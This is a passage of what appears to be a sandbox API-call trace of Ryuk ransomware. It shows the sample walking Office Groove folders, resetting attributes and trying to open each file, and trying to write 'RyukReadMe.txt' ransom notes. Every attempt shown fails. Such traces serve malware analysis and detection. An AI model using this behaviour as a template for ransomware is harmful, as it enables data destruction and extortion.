dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.988] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.988] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.989] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.989] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.989] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\LISTBOX.JPG", dwFileAttributes=0x80) returned 0 [0136.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\LISTBOX.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\listbox.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.990] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.990] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.990] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.990] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\NUMERIC.JPG", dwFileAttributes=0x80) returned 0 [0136.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\NUMERIC.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\numeric.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.990] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.990] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.990] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.990] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\PASSWORD.JPG", dwFileAttributes=0x80) returned 0 [0136.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\PASSWORD.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\password.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.991] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.991] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.991] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.991] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.991] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\RADIO.JPG", dwFileAttributes=0x80) returned 0 [0136.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\RADIO.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\radio.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.991] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.991] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.991] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.991] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.992] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\SectionHeading.jpg", dwFileAttributes=0x80) returned 0 [0136.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\SectionHeading.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\sectionheading.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.992] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.992] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.992] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.993] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.993] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\StaticText.jpg", dwFileAttributes=0x80) returned 0 [0136.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\StaticText.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\statictext.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.993] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.993] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.994] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.994] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTAREA.JPG", dwFileAttributes=0x80) returned 0 [0136.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTAREA.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\textarea.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.994] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.994] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.994] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.994] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTBOX.JPG", dwFileAttributes=0x80) returned 0 [0136.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTBOX.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\textbox.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.995] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.995] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.995] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.995] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.995] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTVIEW.JPG", dwFileAttributes=0x80) returned 0 [0136.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTVIEW.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\textview.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.995] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.995] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.995] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.995] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.995] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\UnformattedNumeric.jpg", dwFileAttributes=0x80) returned 0 [0136.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\UnformattedNumeric.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\unformattednumeric.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.996] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.996] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.996] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0136.996] FindClose (in: hFindFile=0x3b49a0 | out: hFindFile=0x3b49a0) returned 1 [0136.997] SetLastError (dwErrCode=0x0) [0136.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.999] GetLastError () returned 0x5 [0136.999] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0136.999] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.999] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.999] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.999] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO", dwFileAttributes=0x80) returned 0 [0137.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\form.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.000] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.000] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.000] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.000] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.000] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBlankPage.html", dwFileAttributes=0x80) returned 0 [0137.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsblankpage.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.001] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.001] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.001] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.001] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBrowserUpgrade.html", dwFileAttributes=0x80) returned 0 [0137.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsbrowserupgrade.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.002] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.002] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.002] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.002] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsDoNotTrust.html", dwFileAttributes=0x80) returned 0 [0137.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsDoNotTrust.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsdonottrust.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.003] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.003] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.003] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.003] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.003] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePage.html", dwFileAttributes=0x80) returned 0 [0137.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepage.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.004] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.004] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.004] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.004] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.004] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageScript.js", dwFileAttributes=0x80) returned 0 [0137.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageScript.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepagescript.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.005] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.005] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.005] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.005] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.006] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageStyle.css", dwFileAttributes=0x80) returned 0 [0137.006] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageStyle.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepagestyle.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.006] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.006] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.006] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.006] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.007] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPreviewTemplate.html", dwFileAttributes=0x80) returned 0 [0137.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formspreviewtemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.007] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.007] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.007] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.007] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.008] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPrintTemplate.html", dwFileAttributes=0x80) returned 0 [0137.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsprinttemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.008] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.008] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.009] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.009] SetLastError (dwErrCode=0x0) [0137.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.009] GetLastError () returned 0x5 [0137.009] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0137.009] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.009] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2d00 [0137.010] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.010] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.010] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.010] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt", dwFileAttributes=0x80) returned 0 [0137.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Customer Support.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\customer support.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.011] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.011] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.011] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.011] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.011] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt", dwFileAttributes=0x80) returned 0 [0137.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hardware Tracker.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hardware tracker.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.011] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.011] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.011] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.011] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.011] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt", dwFileAttributes=0x80) returned 0 [0137.012] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition - Customized.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition - customized.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.012] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.012] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.012] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.012] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.012] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt", dwFileAttributes=0x80) returned 0 [0137.012] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.012] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.012] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.012] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.012] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT", dwFileAttributes=0x80) returned 0 [0137.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT" (normalized: "c:\\program files\\microsoft 